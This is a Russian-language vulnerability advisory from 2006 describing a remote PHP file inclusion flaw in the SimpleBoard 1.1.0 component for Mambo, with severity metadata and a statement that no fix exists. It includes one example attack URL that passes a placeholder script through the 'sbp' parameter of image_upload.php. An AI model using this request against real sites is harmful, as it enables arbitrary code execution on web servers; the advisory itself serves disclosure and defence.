PHP-инклюдинг в Mambo SimpleBoard

Дата публикации:
11.07.2006
Всего просмотров:
10050
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SimpleBoard 1.x (компонент к Mambo)
Уязвимые версии: SimpleBoard (модуль к Mambo) 1.1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "sbp" в сценарии components/com_simpleboard/image_upload.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script]

URL производителя: www.tsmf.net/content/view/159/63/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: SimpleBoard Mambo Component <= 1.1.0 Remote Include Vulnerability

или введите имя

CAPTCHA